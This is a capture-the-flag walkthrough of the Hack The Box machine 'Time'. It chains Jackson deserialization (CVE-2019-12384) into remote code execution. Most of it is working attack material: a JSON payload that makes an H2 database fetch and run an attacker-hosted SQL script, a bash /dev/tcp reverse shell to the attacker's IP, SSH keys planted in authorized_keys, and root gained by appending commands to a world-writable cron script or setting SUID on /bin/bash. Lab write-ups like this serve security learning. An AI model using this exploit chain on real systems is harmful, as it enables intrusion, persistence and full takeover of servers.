Hack-The-Box-walkthrough[time]

Posted on Edited on In Views: Word count in article: 1.3k Reading time ≈ 5 mins.

introduce

OS: Linux
Difficulty: Medium
Points: 30
Release: 24 Oct 2020
IP: 10.10.10.214

User Blood Sp3eD 00 days, 00 hours, 08 mins, 51 seconds.
Root Blood Sp3eD 00 days, 00 hours, 17 mins, 49 seconds.

  • my htb rank

information gathering

first use nmap as usaul

1
2
3
4
5
root@kali:~/hackthebox/machine/time# nmap -sV -v -p- 10.10.10.214 --min-rate=10000
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

port 80

There is a simple JSON Beautifier and Validator.
Let’s try something Simple means “test” in Beautifier.
It’s said null.
Let’s try in Validator and he also in beta testing.
It’s give some error.

1
Validation failed: Unhandled Java exception: com.fasterxml.jackson.core.JsonParseException: Unrecognized token 'test': was expecting 'null', 'true', 'false' or NaN

com.fasterxml.jackson.core looks interesting. google it and find something.

  • Understanding insecure implementation of Jackson Deserialization

After reading the article , try this command Let’s see how’s it’s work.

1
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object

search it on google and check any solution for this error.

  • com.fasterxml.jackson.databind.exc.MismatchedInputException

This stack overflow gave us the solution of our problem that we need to use ‘[]’ instead of ‘{}’. Let’s try this real quick.

1
Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.InvalidTypeIdException: Could not resolve type id 'test' as a subtype of [simple type, class java.lang.Object]: no such class found

We got the error but it is different one. It’s say “Could not resolve type id ‘test’, no class found”.

After a few google search i found the interesting

  • CVE-2019-12384

exploit

  1. step1

Create a file inject.sql Change the ip and port.

1
2
3
4
5
6
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {"bash", "-c", cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
	return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('setsid bash -i &>/dev/tcp/10.10.14.2/3344 0>&1 &')
  1. step2

Start python server and netcat Listener.

1
2
root@kali:~/hackthebox/machine/time# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
  1. step3

Go on the website select “Validate (beta!)” and input this:
Change the ip address also.

1
["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.2/inject.sql'"}]

And we got the shell and also get user flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@kali:~# nc -lvp 3344
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::3344
Ncat: Listening on 0.0.0.0:3344
Ncat: Connection from 10.10.10.214.
Ncat: Connection from 10.10.10.214:60198.
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
pericles@time:/var/www/html$ id
id
uid=1000(pericles) gid=1000(pericles) groups=1000(pericles)
pericles@time:/var/www/html$ whoami
whoami
pericles
pericles@time:/var/www/html$ cd
cd
bash: cd: HOME not set
pericles@time:/var/www/html$ cd ~
cd ~
pericles@time:/home/pericles$ ls
ls
snap
user.txt
pericles@time:/home/pericles$ cat user.txt
cat user.txt
f1cd7712d0ea3d98f672c90c975aa156

put the ssh public key and get the ssh connection.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
pericles@time:/home/pericles$ mkdir .ssh
mkdir .ssh
pericles@time:/home/pericles$ ls -la
ls -la
total 48
drwxr-xr-x 8 pericles pericles 4096 Nov  7 09:04 .
drwxr-xr-x 3 root     root     4096 Oct  2 13:45 ..
lrwxrwxrwx 1 root     root        9 Oct  1 15:05 .bash_history -> /dev/null
-rw-r--r-- 1 pericles pericles  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 pericles pericles 3771 Feb 25  2020 .bashrc
drwx------ 2 pericles pericles 4096 Sep 20 13:53 .cache
drwx------ 3 pericles pericles 4096 Oct 22 17:45 .config
drwx------ 2 pericles pericles 4096 Nov  6 19:31 .gnupg
lrwxrwxrwx 1 root     root        9 Oct  1 15:07 .lhistory -> /dev/null
drwxrwxr-x 3 pericles pericles 4096 Sep 29 12:52 .local
-rw-r--r-- 1 pericles pericles  807 Feb 25  2020 .profile
drwxr-xr-x 2 pericles pericles 4096 Nov  7 09:04 .ssh
drwxr-xr-x 3 pericles pericles 4096 Oct  2 13:20 snap
-r-------- 1 pericles pericles   33 Nov  6 13:19 user.txt
pericles@time:/home/pericles$ cd .ssh
cd .ssh
pericles@time:/home/pericles/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMR1r7B7aiEe6j+wBsVumAFqFXCiqw2iSrcg1S7rC1BdlVqr8YfWnT6e/e3+TAJk9idtLz/wN2MkupWtI1ddtNTJz31RQb0WMGjq7p8Usg0uIYhQH0PTN/GmPXDhqLIPcbTnNQMcV2PnwM07eXxQH0+s9rqVO8cR2z2f35bKe3WrHNnT7NwfOoWqNJxh+V8OGgfF8LhS0E46I6co76MJAIsX24Zs9r/dY+JPOlJlS3K2Kf3xSfPAScQeWip1WYY9depVuQywk12kOUikzGNjlQ4phNba47VjfycyV34cLw0/vQcDv5hMCfaK+hoE5rBXysnVx/f3n3zRYMLomgveQUCLBYUwJPE2t0VzeeX4W9wxrAOl2Njx5TI4cEFnmlp/6lO/iK+aC6BSBRxU19jS2fUchiN9PMgLSYGzhuIxOLvvd9AlaOYPNM7a5AfjzzO+gd1fv/Mb9EIZCKibtvpHp0eomnSDcDz/b9FNpbvg6V5NBVy2VaufcRbiBDD6cTS00= root@kali" > authorized_keys
<BVy2VaufcRbiBDD6cTS00= root@kali" > authorized_keys
pericles@time:/home/pericles/.ssh$ ls
ls
authorized_keys

now connect to ssh shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
root@kali:~/hackthebox/machine/time# chmod 600 id_rsa 
root@kali:~/hackthebox/machine/time# ssh -i id_rsa pericles@10.10.10.214
The authenticity of host '10.10.10.214 (10.10.10.214)' can't be established.
ECDSA key fingerprint is SHA256:sMBq2ECkw0OgfWnm+CdzEgN36He1XtCyD76MEhD/EKU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.214' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-52-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 07 Nov 2020 09:07:07 AM UTC

  System load:             0.75
  Usage of /:              23.7% of 29.40GB
  Memory usage:            33%
  Swap usage:              0%
  Processes:               249
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.214
  IPv6 address for ens160: dead:beef::250:56ff:feb9:da3d


83 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable


Last login: Fri Oct 23 09:19:19 2020 from 10.10.14.5
pericles@time:~$ id
uid=1000(pericles) gid=1000(pericles) groups=1000(pericles)
pericles@time:~$ whoami
pericles

Privilege escalation

run the LinEnum

  • privilege-escalation-awesome-scripts-suite

Found interesting file in LinEnum result.

1
/bin/bash /usr/bin/timer_backup.sh

check we have any rights to write the file or not.

1
2
pericles@time:~$ ls -la /usr/bin/timer_backup.sh
-rwxrw-rw- 1 pericles pericles 88 Nov  7 09:15 /usr/bin/timer_backup.sh

We have Permission to write the file. Let’s replace root SSH_PUB_KEY with our’s ssh public key.

1
2
3
4
5
pericles@time:~$ echo "echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMR1r7B7aiEe6j+wBsVumAFqFXCiqw2iSrcg1S7rC1BdlVqr8YfWnT6e/e3+TAJk9idtLz/wN2MkupWtI1ddtNTJz31RQb0WMGjq7p8Usg0uIYhQH0PTN/GmPXDhqLIPcbTnNQMcV2PnwM07eXxQH0+s9rqVO8cR2z2f35bKe3WrHNnT7NwfOoWqNJxh+V8OGgfF8LhS0E46I6co76MJAIsX24Zs9r/dY+JPOlJlS3K2Kf3xSfPAScQeWip1WYY9depVuQywk12kOUikzGNjlQ4phNba47VjfycyV34cLw0/vQcDv5hMCfaK+hoE5rBXysnVx/f3n3zRYMLomgveQUCLBYUwJPE2t0VzeeX4W9wxrAOl2Njx5TI4cEFnmlp/6lO/iK+aC6BSBRxU19jS2fUchiN9PMgLSYGzhuIxOLvvd9AlaOYPNM7a5AfjzzO+gd1fv/Mb9EIZCKibtvpHp0eomnSDcDz/b9FNpbvg6V5NBVy2VaufcRbiBDD6cTS00= root@kali >> /root/.ssh/authorized_keys" >> /usr/bin/timer_backup.sh
pericles@time:~$ cat /usr/bin/timer_backup.sh
#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip
echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDMR1r7B7aiEe6j+wBsVumAFqFXCiqw2iSrcg1S7rC1BdlVqr8YfWnT6e/e3+TAJk9idtLz/wN2MkupWtI1ddtNTJz31RQb0WMGjq7p8Usg0uIYhQH0PTN/GmPXDhqLIPcbTnNQMcV2PnwM07eXxQH0+s9rqVO8cR2z2f35bKe3WrHNnT7NwfOoWqNJxh+V8OGgfF8LhS0E46I6co76MJAIsX24Zs9r/dY+JPOlJlS3K2Kf3xSfPAScQeWip1WYY9depVuQywk12kOUikzGNjlQ4phNba47VjfycyV34cLw0/vQcDv5hMCfaK+hoE5rBXysnVx/f3n3zRYMLomgveQUCLBYUwJPE2t0VzeeX4W9wxrAOl2Njx5TI4cEFnmlp/6lO/iK+aC6BSBRxU19jS2fUchiN9PMgLSYGzhuIxOLvvd9AlaOYPNM7a5AfjzzO+gd1fv/Mb9EIZCKibtvpHp0eomnSDcDz/b9FNpbvg6V5NBVy2VaufcRbiBDD6cTS00= root@kali >> /root/.ssh/authorized_keys

now ssh in and we got root.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
root@kali:~/hackthebox/machine/time# ssh -i id_rsa root@10.10.10.214
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-52-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat 07 Nov 2020 09:19:05 AM UTC

  System load:             0.0
  Usage of /:              23.8% of 29.40GB
  Memory usage:            33%
  Swap usage:              0%
  Processes:               250
  Users logged in:         0
  IPv4 address for ens160: 10.10.10.214
  IPv6 address for ens160: dead:beef::250:56ff:feb9:da3d


83 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Thu Oct 22 17:03:52 2020
root@time:~# id
uid=0(root) gid=0(root) groups=0(root)
root@time:~# whoami
root
root@time:~# ls
backup.zip  root.txt  snap  timer_backup.sh
root@time:~# cat root.txt
4061f1369e60de8e0c1522bdd4421ecb

Privilege escalation 2

1
2
3
4
5
6
7
8
9
10
11
pericles@time:~$ echo "chmod +s /bin/bash" >> /usr/bin/timer_backup.sh
pericles@time:~$ /bin/bash -p
bash-5.0# id
uid=1000(pericles) gid=1000(pericles) euid=0(root) egid=0(root) groups=0(root),1000(pericles)
bash-5.0# whoami
root
bash-5.0# ls
snap  user.txt
bash-5.0# cd /root
bash-5.0# cat root.txt
4061f1369e60de8e0c1522bdd4421ecb

Summary of knowledge

  • Jackson Deserialization
  • CVE-2019-12384 exploit
  • file permission to excecute

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…